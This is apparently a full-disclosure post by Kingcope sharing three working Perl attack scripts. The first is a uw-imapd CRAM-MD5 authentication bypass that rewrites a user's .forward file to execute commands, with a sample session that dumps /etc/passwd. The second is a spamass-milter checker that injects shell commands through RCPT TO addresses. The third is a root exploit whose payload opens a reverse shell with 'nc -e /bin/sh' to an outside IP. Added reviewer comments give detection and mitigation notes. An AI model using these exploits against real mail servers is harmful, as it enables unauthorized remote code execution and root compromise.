Here are two goodies. 1.) uw-imapd < imap-2004b Remote Exploit 2.) Spamass-milter 0day vulnerability verifier + root exploit (at the bottom) WARNING: USE AT YOUR OWN RISK + YOU WON'T FIND MANY TARGETS FOR BOTHS VULNS, I VERIFIED.

---snip---
#!/usr/bin/perl
# CVE-2005-0198 Exploit by Kingcope
# Exploited in May 2010
# One can See from the imap Banner if the Server is Vulnerable:
# Vulnerable (CRAM-MD5 supported and right IMAP4rev1 Version) is e.g.:
# * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN] localhost IMAP4rev1 2002.332 at Sun, 14 Mar 2010 20:40:09 +0000 (GMT)
# You need a VALID username but NOT A VALID password
# Relies on both uw-imapd (< imap-2004b) and a MTA like sendmail to be installed remotely (.forward trickery).
#
# NOTE(review): defender summary for this script.
# Risk: given a valid username, the CRAM-MD5 exchange is accepted without the
# real password (the script answers the challenge with the fixed secret
# "waco"); the authenticated IMAP session then replaces the user's .forward
# via DELETE/CREATE/APPEND, and one message delivered over SMTP makes the MTA
# run it. The outcome is command execution as that mail user.
# Detection: IMAP logs showing several "AUTHENTICATE CRAM-MD5 failed" lines
# followed by a success for the same user, and the mailbox names ".forward"
# and "/tmp/0wned" in IMAP commands, match the session transcript below.
# Mitigation: upgrade uw-imapd to imap-2004b or later (the author gives
# "< imap-2004b" as the vulnerable range); not advertising AUTH=CRAM-MD5 where
# it is unused reduces exposure -- confirm against the local build.
#
# EXPLOIT SESSION:
#
#./imap.pl 192.168.2.17 kcope "cat /etc/passwd"
#uw-imapd (< imap-2004b) remote exploit by Kingcope
#* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN] [192.168.2.
#17] IMAP4rev1 2003.338 at Sun, 14 Mar 2010 23:53:53 +0000 (GMT)
#
#++ Break In 1
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT S
#CAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User kcope authent
#icated
#++ SUCCESS 1 - Authenticated
#++ Break In 2
#220 localhost.Belkin ESMTP Sendmail 8.12.9p2/8.12.9; Sun, 14 Mar 2010 23:54:08 G
#MT
#250 localhost.Belkin Hello [192.168.2.15], pleased to meet you
#250 2.1.0 me@foobar.org... Sender ok
#250 2.1.5 kcope@localhost.Belkin... Recipient ok
#354 Enter mail, end with "." on a line by itself
#250 2.0.0 o2ENs82U002757 Message accepted for delivery
#++ Waiting for .forward file to be executed
#A002 OK DELETE completed
#A002 OK CREATE completed
#+ Ready for argument
#A002 OK APPEND completed
#* 1 EXISTS
#* 1 RECENT
#* OK [UIDVALIDITY 1268610848] UID validity status
#* OK [UIDNEXT 2] Predicted next UID
#* NO [UIDNOTSTICKY] Non-permanent unique identifiers: /tmp/0wned
#* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
#* OK [PERMANENTFLAGS ()] Permanent flags
#* OK [UNSEEN 1] first unseen message in /tmp/0wned
#A002 OK [READ-ONLY] SELECT completed
#* 1 FETCH (BODY[] {1334}
#Date: Sun, 14 Mar 2010 23:54:08 +0000
#From: kcope@localhost.Belkin
#Subject: /tmp/0wned
#MIME-Version: 1.0
#Content-Type: TEXT/PLAIN; charset=US-ASCII
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
#root:*:0:0:Charlie &:/root:/bin/csh
#toor:*:0:0:Bourne-again Superuser:/root:
#daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
#operator:*:2:5:System &:/:/sbin/nologin
#bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
#tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
#kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
#games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
#news:*:8:8:News Subsystem:/:/sbin/nologin
#man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
#sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
#smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
#mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
#bind:*:53:53:Bind Sandbox:/:/sbin/nologin
#uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
#xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
#pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
#www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
#nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
#kcope:*:1001:0:User &:/home/kcope:/bin/sh
#)
#* 1 FETCH (FLAGS (\Recent \Seen))
#A002 OK FETCH completed

use Digest::HMAC_MD5 qw(hmac_md5_hex);
use MIME::Base64;
use IO::Socket::INET;

print "uw-imapd (< imap-2004b) remote exploit by Kingcope\r\n";

# Three arguments are required: host, username, command.
if ($#ARGV != 2) {
    print "usage: imap.pl \n";
    print "example: imap.pl www.target.com foouser \"cat /etc/services\"\n";
    exit;
}

$host = $ARGV[0];
$command = $ARGV[2];
$|=1;

# Plain-text IMAP on port 143; no strict/warnings, so every variable here is a
# package global and a failed connect leaves $sock undef.
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 143, Proto => 'tcp');
$resp = <$sock>;
print $resp."\n";

print "++ Break In 1\n";
# Up to five CRAM-MD5 attempts. Each one expects a "+ <base64 challenge>" line
# from the server; anything else is taken as "CRAM-MD5 not offered".
for ($k=0;$k<5;$k++) {
    print $sock "A001 AUTHENTICATE CRAM-MD5\r\n";
    $resp = <$sock>;
    print $resp;
    if (index($resp, "+") != 0) {
        print "-- No CRAM-MD5 Authen supported .\n";
        exit;
    }
    $user = $ARGV[1];
    # The secret is a fixed string, not the user's password; the header comment
    # states that a valid password is not needed, which is the flaw itself.
    $secret = "waco";
    @data = split(" ", $resp);
    chomp($data[1]);
    $stamp = $data[1];
    $decoded_stamp = decode_base64($stamp);
    $hmac = hmac_md5_hex($decoded_stamp, $secret);
    $answer = encode_base64($user . ' ' . $hmac);
    chomp($answer);
    print $sock $answer . "\r\n";
    $resp = <$sock>;
    print $resp;
    # Any "OK " in the reply is treated as a successful login.
    if (index($resp, "OK ") >= 0) {
        goto Authenticated;
    }
}
print "-- Could not bypass Authen .\n";
exit;

Authenticated:
print "++ SUCCESS 1 - Authenticated\n";
print "++ Break In 2\n";

# The mailbox named ".forward" in the user's home is deleted, recreated and
# appended to; the appended "message" is a pipe-to-shell line, which is why a
# defender should watch for APPEND/CREATE on that name.
$msg = "|\"/bin/sh -c '$command' > /tmp/0wned 2>&1;\"";
print $sock "A002 DELETE .forward\r\n";
print $sock "A002 CREATE .forward\r\n";
print $sock "A002 APPEND .forward (\\Seen) {". length($msg) ."}\r\n" . $msg ."\r\n";

# Second connection, SMTP on port 25, to deliver one message to the user so
# the MTA processes the rewritten .forward. The HELO reply is split on
# whitespace to pick up the server's own hostname.
$sock2 = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 25, Proto => 'tcp');
$resp = <$sock2>;
print $resp;
print $sock2 "HELO you\r\n";
$resp = <$sock2>;
print $resp;
@remhost = split(" ", $resp);
print $sock2 "MAIL FROM: me\@foobar.org\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 "RCPT TO: kcope\@$remhost[1]\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 "DATA\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 ".\r\n";
$resp = <$sock2>;
print $resp;

print "++ Waiting for .forward file to be executed\r\n";
# Fixed three-second wait for local delivery; there is no check that it ran.
sleep(3);

# Read the command output back through the still-open IMAP session.
print $sock "A002 SELECT /tmp/0wned\r\n";
$resp = <$sock>;
print $resp;
print $sock "A002 FETCH 1 BODY[]\r\n";
while(<$sock>) {
    print $_;
}
---snip---

The following script will check if a remote server is vulnerable to the spamass-milter vulnerability.

---snip---
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# postfix_joker.pl
# Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope
# March 2010
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# NOTE(review): defender summary for this checker.
# The first SMTP session delivers the GTUBE test string and treats a
# "Blocked by SpamAssassin" reply as the sign that spamass-milter sits in
# front of the MTA. The second session sends RCPT TO addresses whose local
# part carries a quoted "|pkill -HUP ..." command in the address extension
# (one form for Postfix, one for Sendmail) and records "IS VULNERABLE" when
# the server stops answering. That probe is not passive: it signals the MTA
# if it works, so it must only be run against systems one owns.
# Detection: mail logs with RCPT TO local parts containing '|' or '("', and
# a GTUBE message shortly before them from the same client.
# Mitigation: run a spamass-milter release that fixes this recipient-handling
# flaw (no version is given on this page -- check the vendor advisory);
# presumably the milter hands recipient addresses to a shell, confirm there.

use IO::Socket;
$|=1;

# Session 1: fingerprint via GTUBE.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: \r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster\@$hostname[1]\r\n";
$x = <$sock>;
print $x;
print $sock "DATA\r\n";
$x = <$sock>;
print $x;
print $sock "XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n";
print $sock "\r\n.\r\n";
$x = <$sock>;
print $x;
if (!($x =~ "Blocked by SpamAssassin")) {
    exit;
}
print "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n";
# Bareword, two-arg, unchecked open: the verdict is appended to log.txt in
# the current directory and any write failure is silently ignored.
open LOGFILE, ">>log.txt";
print LOGFILE "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n";
close LOGFILE;

# Session 2: recipient-extension probes.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: \r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+:(\"|pkill -HUP smtpd|\")\@$hostname[1]\r\n";
$x = <$sock>;
if ($x=="") {
    print "\n\n$ARGV[0] IS VULNERABLE!\n";
    open LOGFILE, ">>log.txt";
    print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n";
    close LOGFILE;
    exit;
}
print $x;
print $sock "RCPT TO: postmaster+(\"|pkill -HUP sendmail|\")\@$hostname[1]\r\n";
$x = <$sock>;
if ($x=="") {
    print "\n\n$ARGV[0] IS VULNERABLE!\n";
    open LOGFILE, ">>log.txt";
    print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n";
    close LOGFILE;
    exit;
}
print $x;
print $sock "QUIT\r\n";
while(<$sock>) {
    print;
}
---snip---

Spamass-milter Root Exploit PoC

---snip---
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# postfix_joker.pl
# Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope
# March 2010
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# NOTE(review): defender summary for this PoC.
# Same two-session structure as the checker above, but the RCPT TO extension
# carries a hard-coded reverse-shell command pointing at the author's
# address and port from this page (85.25.67.37, TCP 5555).
# Detection: in addition to the RCPT TO patterns noted for the checker, an
# outbound TCP connection from the mail host to an external address on port
# 5555 right after such an SMTP session, and a long-lived "sleep 1000" child
# under the milter or MTA process.
# Mitigation: as for the checker -- a fixed spamass-milter release and egress
# filtering from mail hosts, which would also break this payload's callback.

use IO::Socket;
$|=1;

# Session 1: fingerprint via GTUBE.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: \r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster\@$hostname[1]\r\n";
$x = <$sock>;
print $x;
print $sock "DATA\r\n";
$x = <$sock>;
print $x;
print $sock "XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n";
print $sock "\r\n.\r\n";
$x = <$sock>;
print $x;
if (!($x =~ "Blocked by SpamAssassin")) {
    exit;
}

# Session 2: the two payload recipients, one per MTA flavour.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: \r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+:(\"|nc -e /bin/sh 85.25.67.37 5555;sleep 1000|\")\@$hostname[1]\r\n"; # POSTFIX!
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+(\"|nc -e /bin/sh 85.25.67.37 5555;sleep 1000|\")\@$hostname[1]\r\n"; # SENDMAIL!
$x = <$sock>;
print $x;
print $sock "QUIT\r\n";
while(<$sock>) {
    print;
}
---snip---

Cheers, Kingcope